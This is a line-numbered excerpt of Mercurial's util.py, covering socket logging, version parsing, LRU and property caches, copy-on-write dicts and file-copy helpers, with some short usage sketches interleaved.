1006 1012 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1007 1013 )
1008 1014
1009 1015 self._writedata(buf[0:res])
1010 1016
1011 1017 def send(self, res, data, flags=0):
1012 1018 if not self.writes:
1013 1019 return
1014 1020
1015 1021 self.fh.write(
1016 1022 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1017 1023 )
1018 1024 self._writedata(data)
1019 1025
1020 1026 def sendall(self, res, data, flags=0):
1021 1027 if not self.writes:
1022 1028 return
1023 1029
1024 1030 if self.logdataapis:
1025 1031 # Returns None on success. So don't bother reporting return value.
1026 1032 self.fh.write(
1027 1033 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1028 1034 )
1029 1035
1030 1036 self._writedata(data)
1031 1037
1032 1038 def sendto(self, res, data, flagsoraddress, address=None):
1033 1039 if not self.writes:
1034 1040 return
1035 1041
1036 1042 if address:
1037 1043 flags = flagsoraddress
1038 1044 else:
1039 1045 flags = 0
1040 1046
1041 1047 if self.logdataapis:
1042 1048 self.fh.write(
1043 1049 b'%s> sendto(%d, %d, %r) -> %d'
1044 1050 % (self.name, len(data), flags, address, res)
1045 1051 )
1046 1052
1047 1053 self._writedata(data)
1048 1054
1049 1055 def setblocking(self, res, flag):
1050 1056 if not self.states:
1051 1057 return
1052 1058
1053 1059 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1054 1060
1055 1061 def settimeout(self, res, value):
1056 1062 if not self.states:
1057 1063 return
1058 1064
1059 1065 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1060 1066
1061 1067 def gettimeout(self, res):
1062 1068 if not self.states:
1063 1069 return
1064 1070
1065 1071 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1066 1072
1067 1073 def setsockopt(self, res, level, optname, value):
1068 1074 if not self.states:
1069 1075 return
1070 1076
1071 1077 self.fh.write(
1072 1078 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1073 1079 % (self.name, level, optname, value, res)
1074 1080 )
1075 1081
1076 1082
1077 1083 def makeloggingsocket(
1078 1084 logh,
1079 1085 fh,
1080 1086 name,
1081 1087 reads=True,
1082 1088 writes=True,
1083 1089 states=True,
1084 1090 logdata=False,
1085 1091 logdataapis=True,
1086 1092 ):
1087 1093 """Turn a socket into a logging socket."""
1088 1094
1089 1095 observer = socketobserver(
1090 1096 logh,
1091 1097 name,
1092 1098 reads=reads,
1093 1099 writes=writes,
1094 1100 states=states,
1095 1101 logdata=logdata,
1096 1102 logdataapis=logdataapis,
1097 1103 )
1098 1104 return socketproxy(fh, observer)
1099 1105
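And the socket analogue, sketched with socketpair() where it is available (the
peer name and payload are illustrative):

    import io
    import socket

    a, b = socket.socketpair()
    logged = makeloggingsocket(io.BytesIO(), a, b'client')
    logged.sendall(b'ping')    # the observer records the send and its data
    a.close()
    b.close()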
1100 1106
1101 1107 def version():
1102 1108 """Return version information if available."""
1103 1109 try:
1104 1110 from . import __version__
1105 1111
1106 1112 return __version__.version
1107 1113 except ImportError:
1108 1114 return b'unknown'
1109 1115
1110 1116
1111 1117 def versiontuple(v=None, n=4):
1112 1118 """Parses a Mercurial version string into an N-tuple.
1113 1119
1114 1120 The version string to be parsed is specified with the ``v`` argument.
1115 1121 If it isn't defined, the current Mercurial version string will be parsed.
1116 1122
1117 1123 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1118 1124 returned values:
1119 1125
1120 1126 >>> v = b'3.6.1+190-df9b73d2d444'
1121 1127 >>> versiontuple(v, 2)
1122 1128 (3, 6)
1123 1129 >>> versiontuple(v, 3)
1124 1130 (3, 6, 1)
1125 1131 >>> versiontuple(v, 4)
1126 1132 (3, 6, 1, '190-df9b73d2d444')
1127 1133
1128 1134 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1129 1135 (3, 6, 1, '190-df9b73d2d444+20151118')
1130 1136
1131 1137 >>> v = b'3.6'
1132 1138 >>> versiontuple(v, 2)
1133 1139 (3, 6)
1134 1140 >>> versiontuple(v, 3)
1135 1141 (3, 6, None)
1136 1142 >>> versiontuple(v, 4)
1137 1143 (3, 6, None, None)
1138 1144
1139 1145 >>> v = b'3.9-rc'
1140 1146 >>> versiontuple(v, 2)
1141 1147 (3, 9)
1142 1148 >>> versiontuple(v, 3)
1143 1149 (3, 9, None)
1144 1150 >>> versiontuple(v, 4)
1145 1151 (3, 9, None, 'rc')
1146 1152
1147 1153 >>> v = b'3.9-rc+2-02a8fea4289b'
1148 1154 >>> versiontuple(v, 2)
1149 1155 (3, 9)
1150 1156 >>> versiontuple(v, 3)
1151 1157 (3, 9, None)
1152 1158 >>> versiontuple(v, 4)
1153 1159 (3, 9, None, 'rc+2-02a8fea4289b')
1154 1160
1155 1161 >>> versiontuple(b'4.6rc0')
1156 1162 (4, 6, None, 'rc0')
1157 1163 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1158 1164 (4, 6, None, 'rc0+12-425d55e54f98')
1159 1165 >>> versiontuple(b'.1.2.3')
1160 1166 (None, None, None, '.1.2.3')
1161 1167 >>> versiontuple(b'12.34..5')
1162 1168 (12, 34, None, '..5')
1163 1169 >>> versiontuple(b'1.2.3.4.5.6')
1164 1170 (1, 2, 3, '.4.5.6')
1165 1171 """
1166 1172 if not v:
1167 1173 v = version()
1168 1174 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1169 1175 if not m:
1170 1176 vparts, extra = b'', v
1171 1177 elif m.group(2):
1172 1178 vparts, extra = m.groups()
1173 1179 else:
1174 1180 vparts, extra = m.group(1), None
1175 1181
1176 1182 assert vparts is not None # help pytype
1177 1183
1178 1184 vints = []
1179 1185 for i in vparts.split(b'.'):
1180 1186 try:
1181 1187 vints.append(int(i))
1182 1188 except ValueError:
1183 1189 break
1184 1190 # (3, 6) -> (3, 6, None)
1185 1191 while len(vints) < 3:
1186 1192 vints.append(None)
1187 1193
1188 1194 if n == 2:
1189 1195 return (vints[0], vints[1])
1190 1196 if n == 3:
1191 1197 return (vints[0], vints[1], vints[2])
1192 1198 if n == 4:
1193 1199 return (vints[0], vints[1], vints[2], extra)
1194 1200
1195 1201
1196 1202 def cachefunc(func):
1197 1203 '''cache the result of function calls'''
1198 1204 # XXX doesn't handle keywords args
1199 1205 if func.__code__.co_argcount == 0:
1200 1206 listcache = []
1201 1207
1202 1208 def f():
1203 1209 if len(listcache) == 0:
1204 1210 listcache.append(func())
1205 1211 return listcache[0]
1206 1212
1207 1213 return f
1208 1214 cache = {}
1209 1215 if func.__code__.co_argcount == 1:
1210 1216 # we gain a small amount of time because
1211 1217 # we don't need to pack/unpack the list
1212 1218 def f(arg):
1213 1219 if arg not in cache:
1214 1220 cache[arg] = func(arg)
1215 1221 return cache[arg]
1216 1222
1217 1223 else:
1218 1224
1219 1225 def f(*args):
1220 1226 if args not in cache:
1221 1227 cache[args] = func(*args)
1222 1228 return cache[args]
1223 1229
1224 1230 return f
1225 1231
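A quick sketch of cachefunc's memoization (the counter list just shows that the
wrapped function runs once per distinct argument):

    calls = []

    def square(x):
        calls.append(x)
        return x * x

    fast = cachefunc(square)
    assert fast(3) == 9
    assert fast(3) == 9
    assert calls == [3]    # computed only once; keyword args are not handled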
1226 1232
1227 1233 class cow(object):
1228 1234 """helper class to make copy-on-write easier
1229 1235
1230 1236 Call preparewrite before doing any writes.
1231 1237 """
1232 1238
1233 1239 def preparewrite(self):
1234 1240 """call this before writes, return self or a copied new object"""
1235 1241 if getattr(self, '_copied', 0):
1236 1242 self._copied -= 1
1237 1243 return self.__class__(self)
1238 1244 return self
1239 1245
1240 1246 def copy(self):
1241 1247 """always do a cheap copy"""
1242 1248 self._copied = getattr(self, '_copied', 0) + 1
1243 1249 return self
1244 1250
1245 1251
1246 1252 class sortdict(collections.OrderedDict):
1247 1253 '''a simple sorted dictionary
1248 1254
1249 1255 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1250 1256 >>> d2 = d1.copy()
1251 1257 >>> d2
1252 1258 sortdict([('a', 0), ('b', 1)])
1253 1259 >>> d2.update([(b'a', 2)])
1254 1260 >>> list(d2.keys()) # should still be in last-set order
1255 1261 ['b', 'a']
1256 1262 >>> d1.insert(1, b'a.5', 0.5)
1257 1263 >>> d1
1258 1264 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1259 1265 '''
1260 1266
1261 1267 def __setitem__(self, key, value):
1262 1268 if key in self:
1263 1269 del self[key]
1264 1270 super(sortdict, self).__setitem__(key, value)
1265 1271
1266 1272 if pycompat.ispypy:
1267 1273 # __setitem__() isn't called as of PyPy 5.8.0
1268 1274 def update(self, src):
1269 1275 if isinstance(src, dict):
1270 1276 src = pycompat.iteritems(src)
1271 1277 for k, v in src:
1272 1278 self[k] = v
1273 1279
1274 1280 def insert(self, position, key, value):
1275 1281 for (i, (k, v)) in enumerate(list(self.items())):
1276 1282 if i == position:
1277 1283 self[key] = value
1278 1284 if i >= position:
1279 1285 del self[k]
1280 1286 self[k] = v
1281 1287
1282 1288
1283 1289 class cowdict(cow, dict):
1284 1290 """copy-on-write dict
1285 1291
1286 1292 Be sure to call d = d.preparewrite() before writing to d.
1287 1293
1288 1294 >>> a = cowdict()
1289 1295 >>> a is a.preparewrite()
1290 1296 True
1291 1297 >>> b = a.copy()
1292 1298 >>> b is a
1293 1299 True
1294 1300 >>> c = b.copy()
1295 1301 >>> c is a
1296 1302 True
1297 1303 >>> a = a.preparewrite()
1298 1304 >>> b is a
1299 1305 False
1300 1306 >>> a is a.preparewrite()
1301 1307 True
1302 1308 >>> c = c.preparewrite()
1303 1309 >>> b is c
1304 1310 False
1305 1311 >>> b is b.preparewrite()
1306 1312 True
1307 1313 """
1308 1314
1309 1315
1310 1316 class cowsortdict(cow, sortdict):
1311 1317 """copy-on-write sortdict
1312 1318
1313 1319 Be sure to call d = d.preparewrite() before writing to d.
1314 1320 """
1315 1321
1316 1322
1317 1323 class transactional(object): # pytype: disable=ignored-metaclass
1318 1324 """Base class for making a transactional type into a context manager."""
1319 1325
1320 1326 __metaclass__ = abc.ABCMeta
1321 1327
1322 1328 @abc.abstractmethod
1323 1329 def close(self):
1324 1330 """Successfully closes the transaction."""
1325 1331
1326 1332 @abc.abstractmethod
1327 1333 def release(self):
1328 1334 """Marks the end of the transaction.
1329 1335
1330 1336 If the transaction has not been closed, it will be aborted.
1331 1337 """
1332 1338
1333 1339 def __enter__(self):
1334 1340 return self
1335 1341
1336 1342 def __exit__(self, exc_type, exc_val, exc_tb):
1337 1343 try:
1338 1344 if exc_type is None:
1339 1345 self.close()
1340 1346 finally:
1341 1347 self.release()
1342 1348
1343 1349
1344 1350 @contextlib.contextmanager
1345 1351 def acceptintervention(tr=None):
1346 1352 """A context manager that closes the transaction on InterventionRequired
1347 1353
1348 1354 If no transaction was provided, this simply runs the body and returns
1349 1355 """
1350 1356 if not tr:
1351 1357 yield
1352 1358 return
1353 1359 try:
1354 1360 yield
1355 1361 tr.close()
1356 1362 except error.InterventionRequired:
1357 1363 tr.close()
1358 1364 raise
1359 1365 finally:
1360 1366 tr.release()
1361 1367
1362 1368
1363 1369 @contextlib.contextmanager
1364 1370 def nullcontextmanager():
1365 1371 yield
1366 1372
1367 1373
1368 1374 class _lrucachenode(object):
1369 1375 """A node in a doubly linked list.
1370 1376
1371 1377 Holds a reference to nodes on either side as well as a key-value
1372 1378 pair for the dictionary entry.
1373 1379 """
1374 1380
1375 1381 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1376 1382
1377 1383 def __init__(self):
1378 1384 self.next = None
1379 1385 self.prev = None
1380 1386
1381 1387 self.key = _notset
1382 1388 self.value = None
1383 1389 self.cost = 0
1384 1390
1385 1391 def markempty(self):
1386 1392 """Mark the node as emptied."""
1387 1393 self.key = _notset
1388 1394 self.value = None
1389 1395 self.cost = 0
1390 1396
1391 1397
1392 1398 class lrucachedict(object):
1393 1399 """Dict that caches most recent accesses and sets.
1394 1400
1395 1401 The dict consists of an actual backing dict - indexed by original
1396 1402 key - and a doubly linked circular list defining the order of entries in
1397 1403 the cache.
1398 1404
1399 1405 The head node is the newest entry in the cache. If the cache is full,
1400 1406 we recycle head.prev and make it the new head. Cache accesses result in
1401 1407 the node being moved to before the existing head and being marked as the
1402 1408 new head node.
1403 1409
1404 1410 Items in the cache can be inserted with an optional "cost" value. This is
1405 1411 simply an integer that is specified by the caller. The cache can be queried
1406 1412 for the total cost of all items presently in the cache.
1407 1413
1408 1414 The cache can also define a maximum cost. If a cache insertion would
1409 1415 cause the total cost of the cache to go beyond the maximum cost limit,
1410 1416 nodes will be evicted to make room for the new node. This can be used
1411 1417 to e.g. set a max memory limit and associate an estimated bytes size
1412 1418 cost to each item in the cache. By default, no maximum cost is enforced.
1413 1419 """
1414 1420
1415 1421 def __init__(self, max, maxcost=0):
1416 1422 self._cache = {}
1417 1423
1418 1424 self._head = head = _lrucachenode()
1419 1425 head.prev = head
1420 1426 head.next = head
1421 1427 self._size = 1
1422 1428 self.capacity = max
1423 1429 self.totalcost = 0
1424 1430 self.maxcost = maxcost
1425 1431
1426 1432 def __len__(self):
1427 1433 return len(self._cache)
1428 1434
1429 1435 def __contains__(self, k):
1430 1436 return k in self._cache
1431 1437
1432 1438 def __iter__(self):
1433 1439 # We don't have to iterate in cache order, but why not.
1434 1440 n = self._head
1435 1441 for i in range(len(self._cache)):
1436 1442 yield n.key
1437 1443 n = n.next
1438 1444
1439 1445 def __getitem__(self, k):
1440 1446 node = self._cache[k]
1441 1447 self._movetohead(node)
1442 1448 return node.value
1443 1449
1444 1450 def insert(self, k, v, cost=0):
1445 1451 """Insert a new item in the cache with optional cost value."""
1446 1452 node = self._cache.get(k)
1447 1453 # Replace existing value and mark as newest.
1448 1454 if node is not None:
1449 1455 self.totalcost -= node.cost
1450 1456 node.value = v
1451 1457 node.cost = cost
1452 1458 self.totalcost += cost
1453 1459 self._movetohead(node)
1454 1460
1455 1461 if self.maxcost:
1456 1462 self._enforcecostlimit()
1457 1463
1458 1464 return
1459 1465
1460 1466 if self._size < self.capacity:
1461 1467 node = self._addcapacity()
1462 1468 else:
1463 1469 # Grab the last/oldest item.
1464 1470 node = self._head.prev
1465 1471
1466 1472 # At capacity. Kill the old entry.
1467 1473 if node.key is not _notset:
1468 1474 self.totalcost -= node.cost
1469 1475 del self._cache[node.key]
1470 1476
1471 1477 node.key = k
1472 1478 node.value = v
1473 1479 node.cost = cost
1474 1480 self.totalcost += cost
1475 1481 self._cache[k] = node
1476 1482 # And mark it as newest entry. No need to adjust order since it
1477 1483 # is already self._head.prev.
1478 1484 self._head = node
1479 1485
1480 1486 if self.maxcost:
1481 1487 self._enforcecostlimit()
1482 1488
1483 1489 def __setitem__(self, k, v):
1484 1490 self.insert(k, v)
1485 1491
1486 1492 def __delitem__(self, k):
1487 1493 self.pop(k)
1488 1494
1489 1495 def pop(self, k, default=_notset):
1490 1496 try:
1491 1497 node = self._cache.pop(k)
1492 1498 except KeyError:
1493 1499 if default is _notset:
1494 1500 raise
1495 1501 return default
1496 1502
1497 1503 assert node is not None # help pytype
1498 1504 value = node.value
1499 1505 self.totalcost -= node.cost
1500 1506 node.markempty()
1501 1507
1502 1508 # Temporarily mark as newest item before re-adjusting head to make
1503 1509 # this node the oldest item.
1504 1510 self._movetohead(node)
1505 1511 self._head = node.next
1506 1512
1507 1513 return value
1508 1514
1509 1515 # Additional dict methods.
1510 1516
1511 1517 def get(self, k, default=None):
1512 1518 try:
1513 1519 return self.__getitem__(k)
1514 1520 except KeyError:
1515 1521 return default
1516 1522
1517 1523 def peek(self, k, default=_notset):
1518 1524 """Get the specified item without moving it to the head
1519 1525
1520 1526 Unlike get(), this doesn't mutate the internal state. But be aware
1521 1527 that it doesn't mean peek() is thread safe.
1522 1528 """
1523 1529 try:
1524 1530 node = self._cache[k]
1525 1531 return node.value
1526 1532 except KeyError:
1527 1533 if default is _notset:
1528 1534 raise
1529 1535 return default
1530 1536
1531 1537 def clear(self):
1532 1538 n = self._head
1533 1539 while n.key is not _notset:
1534 1540 self.totalcost -= n.cost
1535 1541 n.markempty()
1536 1542 n = n.next
1537 1543
1538 1544 self._cache.clear()
1539 1545
1540 1546 def copy(self, capacity=None, maxcost=0):
1541 1547 """Create a new cache as a copy of the current one.
1542 1548
1543 1549 By default, the new cache has the same capacity as the existing one.
1544 1550 But, the cache capacity can be changed as part of performing the
1545 1551 copy.
1546 1552
1547 1553 Items in the copy have an insertion/access order matching this
1548 1554 instance.
1549 1555 """
1550 1556
1551 1557 capacity = capacity or self.capacity
1552 1558 maxcost = maxcost or self.maxcost
1553 1559 result = lrucachedict(capacity, maxcost=maxcost)
1554 1560
1555 1561 # We copy entries by iterating in oldest-to-newest order so the copy
1556 1562 # has the correct ordering.
1557 1563
1558 1564 # Find the first non-empty entry.
1559 1565 n = self._head.prev
1560 1566 while n.key is _notset and n is not self._head:
1561 1567 n = n.prev
1562 1568
1563 1569 # We could potentially skip the first N items when decreasing capacity.
1564 1570 # But let's keep it simple unless it is a performance problem.
1565 1571 for i in range(len(self._cache)):
1566 1572 result.insert(n.key, n.value, cost=n.cost)
1567 1573 n = n.prev
1568 1574
1569 1575 return result
1570 1576
1571 1577 def popoldest(self):
1572 1578 """Remove the oldest item from the cache.
1573 1579
1574 1580 Returns the (key, value) describing the removed cache entry.
1575 1581 """
1576 1582 if not self._cache:
1577 1583 return
1578 1584
1579 1585 # Walk the linked list backwards starting at tail node until we hit
1580 1586 # a non-empty node.
1581 1587 n = self._head.prev
1582 1588 while n.key is _notset:
1583 1589 n = n.prev
1584 1590
1585 1591 assert n is not None # help pytype
1586 1592
1587 1593 key, value = n.key, n.value
1588 1594
1589 1595 # And remove it from the cache and mark it as empty.
1590 1596 del self._cache[n.key]
1591 1597 self.totalcost -= n.cost
1592 1598 n.markempty()
1593 1599
1594 1600 return key, value
1595 1601
1596 1602 def _movetohead(self, node):
1597 1603 """Mark a node as the newest, making it the new head.
1598 1604
1599 1605 When a node is accessed, it becomes the freshest entry in the LRU
1600 1606 list, which is denoted by self._head.
1601 1607
1602 1608 Visually, let's make ``N`` the new head node (* denotes head):
1603 1609
1604 1610 previous/oldest <-> head <-> next/next newest
1605 1611
1606 1612 ----<->--- A* ---<->-----
1607 1613 | |
1608 1614 E <-> D <-> N <-> C <-> B
1609 1615
1610 1616 To:
1611 1617
1612 1618 ----<->--- N* ---<->-----
1613 1619 | |
1614 1620 E <-> D <-> C <-> B <-> A
1615 1621
1616 1622 This requires the following moves:
1617 1623
1618 1624 C.next = D (node.prev.next = node.next)
1619 1625 D.prev = C (node.next.prev = node.prev)
1620 1626 E.next = N (head.prev.next = node)
1621 1627 N.prev = E (node.prev = head.prev)
1622 1628 N.next = A (node.next = head)
1623 1629 A.prev = N (head.prev = node)
1624 1630 """
1625 1631 head = self._head
1626 1632 # C.next = D
1627 1633 node.prev.next = node.next
1628 1634 # D.prev = C
1629 1635 node.next.prev = node.prev
1630 1636 # N.prev = E
1631 1637 node.prev = head.prev
1632 1638 # N.next = A
1633 1639 # It is tempting to do just "head" here, however if node is
1634 1640 # adjacent to head, this will do bad things.
1635 1641 node.next = head.prev.next
1636 1642 # E.next = N
1637 1643 node.next.prev = node
1638 1644 # A.prev = N
1639 1645 node.prev.next = node
1640 1646
1641 1647 self._head = node
1642 1648
1643 1649 def _addcapacity(self):
1644 1650 """Add a node to the circular linked list.
1645 1651
1646 1652 The new node is inserted before the head node.
1647 1653 """
1648 1654 head = self._head
1649 1655 node = _lrucachenode()
1650 1656 head.prev.next = node
1651 1657 node.prev = head.prev
1652 1658 node.next = head
1653 1659 head.prev = node
1654 1660 self._size += 1
1655 1661 return node
1656 1662
1657 1663 def _enforcecostlimit(self):
1658 1664 # This should run after an insertion. It should only be called if total
1659 1665 # cost limits are being enforced.
1660 1666 # The most recently inserted node is never evicted.
1661 1667 if len(self) <= 1 or self.totalcost <= self.maxcost:
1662 1668 return
1663 1669
1664 1670 # This is logically equivalent to calling popoldest() until we
1665 1671 # free up enough cost. We don't do that since popoldest() needs
1666 1672 # to walk the linked list and doing this in a loop would be
1667 1673 # quadratic. So we find the first non-empty node and then
1668 1674 # walk nodes until we free up enough capacity.
1669 1675 #
1670 1676 # If we only removed the minimum number of nodes to free enough
1671 1677 # cost at insert time, chances are high that the next insert would
1672 1678 # also require pruning. This would effectively constitute quadratic
1673 1679 # behavior for insert-heavy workloads. To mitigate this, we set a
1674 1680 # target cost that is a percentage of the max cost. This will tend
1675 1681 # to free more nodes when the high water mark is reached, which
1676 1682 # lowers the chances of needing to prune on the subsequent insert.
1677 1683 targetcost = int(self.maxcost * 0.75)
1678 1684
1679 1685 n = self._head.prev
1680 1686 while n.key is _notset:
1681 1687 n = n.prev
1682 1688
1683 1689 while len(self) > 1 and self.totalcost > targetcost:
1684 1690 del self._cache[n.key]
1685 1691 self.totalcost -= n.cost
1686 1692 n.markempty()
1687 1693 n = n.prev
1688 1694
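A short sketch of lrucachedict's eviction order (keys and capacity are
illustrative):

    d = lrucachedict(2)
    d[b'a'] = 1
    d[b'b'] = 2
    d[b'a']              # touching b'a' makes b'b' the oldest entry
    d[b'c'] = 3          # at capacity: evicts b'b'
    assert b'b' not in d
    assert sorted(d) == [b'a', b'c']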
1689 1695
1690 1696 def lrucachefunc(func):
1691 1697 '''cache most recent results of function calls'''
1692 1698 cache = {}
1693 1699 order = collections.deque()
1694 1700 if func.__code__.co_argcount == 1:
1695 1701
1696 1702 def f(arg):
1697 1703 if arg not in cache:
1698 1704 if len(cache) > 20:
1699 1705 del cache[order.popleft()]
1700 1706 cache[arg] = func(arg)
1701 1707 else:
1702 1708 order.remove(arg)
1703 1709 order.append(arg)
1704 1710 return cache[arg]
1705 1711
1706 1712 else:
1707 1713
1708 1714 def f(*args):
1709 1715 if args not in cache:
1710 1716 if len(cache) > 20:
1711 1717 del cache[order.popleft()]
1712 1718 cache[args] = func(*args)
1713 1719 else:
1714 1720 order.remove(args)
1715 1721 order.append(args)
1716 1722 return cache[args]
1717 1723
1718 1724 return f
1719 1725
1720 1726
1721 1727 class propertycache(object):
1722 1728 def __init__(self, func):
1723 1729 self.func = func
1724 1730 self.name = func.__name__
1725 1731
1726 1732 def __get__(self, obj, type=None):
1727 1733 result = self.func(obj)
1728 1734 self.cachevalue(obj, result)
1729 1735 return result
1730 1736
1731 1737 def cachevalue(self, obj, value):
1732 1738 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1733 1739 obj.__dict__[self.name] = value
1734 1740
1735 1741
1736 1742 def clearcachedproperty(obj, prop):
1737 1743 '''clear a cached property value, if one has been set'''
1738 1744 prop = pycompat.sysstr(prop)
1739 1745 if prop in obj.__dict__:
1740 1746 del obj.__dict__[prop]
1741 1747
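A compact sketch of propertycache and clearcachedproperty together (the class
and attribute are made up for illustration):

    class thing(object):
        runs = 0

        @propertycache
        def expensive(self):
            thing.runs += 1
            return 42

    t = thing()
    assert (t.expensive, t.expensive) == (42, 42)
    assert thing.runs == 1            # second access hit obj.__dict__
    clearcachedproperty(t, b'expensive')
    t.expensive
    assert thing.runs == 2            # recomputed after the cache was cleared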
1742 1748
1743 1749 def increasingchunks(source, min=1024, max=65536):
1744 1750 '''return no less than min bytes per chunk while data remains,
1745 1751 doubling min after each chunk until it reaches max'''
1746 1752
1747 1753 def log2(x):
1748 1754 if not x:
1749 1755 return 0
1750 1756 i = 0
1751 1757 while x:
1752 1758 x >>= 1
1753 1759 i += 1
1754 1760 return i - 1
1755 1761
1756 1762 buf = []
1757 1763 blen = 0
1758 1764 for chunk in source:
1759 1765 buf.append(chunk)
1760 1766 blen += len(chunk)
1761 1767 if blen >= min:
1762 1768 if min < max:
1763 1769 min = min << 1
1764 1770 nmin = 1 << log2(blen)
1765 1771 if nmin > min:
1766 1772 min = nmin
1767 1773 if min > max:
1768 1774 min = max
1769 1775 yield b''.join(buf)
1770 1776 blen = 0
1771 1777 buf = []
1772 1778 if buf:
1773 1779 yield b''.join(buf)
1774 1780
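A sketch of the chunk-growth behaviour (input sizes are arbitrary):

    source = (b'x' * 500 for _ in range(10))
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=4096)]
    # with this input the yielded chunk sizes are [1500, 2500, 1000]:
    # each chunk is at least the current minimum, which doubles toward max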
1775 1781
1776 1782 def always(fn):
1777 1783 return True
1778 1784
1779 1785
1780 1786 def never(fn):
1781 1787 return False
1782 1788
1783 1789
1784 1790 def nogc(func):
1785 1791 """disable garbage collector
1786 1792
1787 1793 Python's garbage collector triggers a GC each time a certain number of
1788 1794 container objects (the number being defined by gc.get_threshold()) are
1789 1795 allocated even when marked not to be tracked by the collector. Tracking has
1790 1796 no effect on when GCs are triggered, only on what objects the GC looks
1791 1797 into. As a workaround, disable GC while building complex (huge)
1792 1798 containers.
1793 1799
1794 1800 This garbage collector issue has been fixed in 2.7. But it still affects
1795 1801 CPython's performance.
1796 1802 """
1797 1803
1798 1804 def wrapper(*args, **kwargs):
1799 1805 gcenabled = gc.isenabled()
1800 1806 gc.disable()
1801 1807 try:
1802 1808 return func(*args, **kwargs)
1803 1809 finally:
1804 1810 if gcenabled:
1805 1811 gc.enable()
1806 1812
1807 1813 return wrapper
1808 1814
1809 1815
1810 1816 if pycompat.ispypy:
1811 1817 # PyPy runs slower with gc disabled
1812 1818 nogc = lambda x: x
1813 1819
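Typical use is as a decorator around code that builds huge containers; this
sketch is illustrative:

    @nogc
    def buildhugemap(entries):
        # allocate many container objects without triggering GC passes
        return {e: None for e in entries}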
1814 1820
1815 1821 def pathto(root, n1, n2):
1816 1822 '''return the relative path from one place to another.
1817 1823 root should use os.sep to separate directories
1818 1824 n1 should use os.sep to separate directories
1819 1825 n2 should use "/" to separate directories
1820 1826 returns an os.sep-separated path.
1821 1827
1822 1828 If n1 is a relative path, it is assumed to be
1823 1829 relative to root.
1824 1830 n2 should always be relative to root.
1825 1831 '''
1826 1832 if not n1:
1827 1833 return localpath(n2)
1828 1834 if os.path.isabs(n1):
1829 1835 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1830 1836 return os.path.join(root, localpath(n2))
1831 1837 n2 = b'/'.join((pconvert(root), n2))
1832 1838 a, b = splitpath(n1), n2.split(b'/')
1833 1839 a.reverse()
1834 1840 b.reverse()
1835 1841 while a and b and a[-1] == b[-1]:
1836 1842 a.pop()
1837 1843 b.pop()
1838 1844 b.reverse()
1839 1845 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1840 1846
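# Illustrative example (not part of util.py), shown with a POSIX os.sep:
#
# >>> pathto(b'/repo', b'a/b/x.txt', b'a/c/y.txt')
# '../../c/y.txt'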
1841 1847
1842 1848 def checksignature(func):
1843 1849 '''wrap a function with code to check for calling errors'''
1844 1850
1845 1851 def check(*args, **kwargs):
1846 1852 try:
1847 1853 return func(*args, **kwargs)
1848 1854 except TypeError:
1849 1855 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1850 1856 raise error.SignatureError
1851 1857 raise
1852 1858
1853 1859 return check
1854 1860
1855 1861
1856 1862 # a whitelist of known filesystems where hardlinks work reliably
1857 1863 _hardlinkfswhitelist = {
1858 1864 b'apfs',
1859 1865 b'btrfs',
1860 1866 b'ext2',
1861 1867 b'ext3',
1862 1868 b'ext4',
1863 1869 b'hfs',
1864 1870 b'jfs',
1865 1871 b'NTFS',
1866 1872 b'reiserfs',
1867 1873 b'tmpfs',
1868 1874 b'ufs',
1869 1875 b'xfs',
1870 1876 b'zfs',
1871 1877 }
1872 1878
1873 1879
1874 1880 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1875 1881 '''copy a file, preserving mode and optionally other stat info like
1876 1882 atime/mtime
1877 1883
1878 1884 checkambig argument is used with filestat, and is useful only if
1879 1885 destination file is guarded by any lock (e.g. repo.lock or
1880 1886 repo.wlock).
1881 1887
1882 1888 copystat and checkambig should be exclusive.
1883 1889 '''
1884 1890 assert not (copystat and checkambig)
1885 1891 oldstat = None
1886 1892 if os.path.lexists(dest):
1887 1893 if checkambig:
1888 1894 oldstat = checkambig and filestat.frompath(dest)
1889 1895 unlink(dest)
1890 1896 if hardlink:
1891 1897 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1892 1898 # unless we are confident that dest is on a whitelisted filesystem.
1893 1899 try:
1894 1900 fstype = getfstype(os.path.dirname(dest))
1895 1901 except OSError:
1896 1902 fstype = None
1897 1903 if fstype not in _hardlinkfswhitelist:
1898 1904 hardlink = False
1899 1905 if hardlink:
1900 1906 try:
1901 1907 oslink(src, dest)
1902 1908 return
1903 1909 except (IOError, OSError):
1904 1910 pass # fall back to normal copy
1905 1911 if os.path.islink(src):
1906 1912 os.symlink(os.readlink(src), dest)
1907 1913 # copytime is ignored for symlinks, but in general copytime isn't needed
1908 1914 # for them anyway
1909 1915 else:
1910 1916 try:
1911 1917 shutil.copyfile(src, dest)
1912 1918 if copystat:
1913 1919 # copystat also copies mode
1914 1920 shutil.copystat(src, dest)
1915 1921 else:
1916 1922 shutil.copymode(src, dest)
1917 1923 if oldstat and oldstat.stat:
1918 1924 newstat = filestat.frompath(dest)
1919 1925 if newstat.isambig(oldstat):
1920 1926 # stat of copied file is ambiguous to original one
1921 1927 advanced = (
1922 1928 oldstat.stat[stat.ST_MTIME] + 1
1923 1929 ) & 0x7FFFFFFF
1924 1930 os.utime(dest, (advanced, advanced))
1925 1931 except shutil.Error as inst:
1926 1932 raise error.Abort(stringutil.forcebytestr(inst))
1927 1933
1928 1934
1929 1935 def copyfiles(src, dst, hardlink=None, progress=None):
1930 1936 """Copy a directory tree using hardlinks if possible."""
1931 1937 num = 0
1932 1938
1933 1939 def settopic():
1934 1940 if progress:
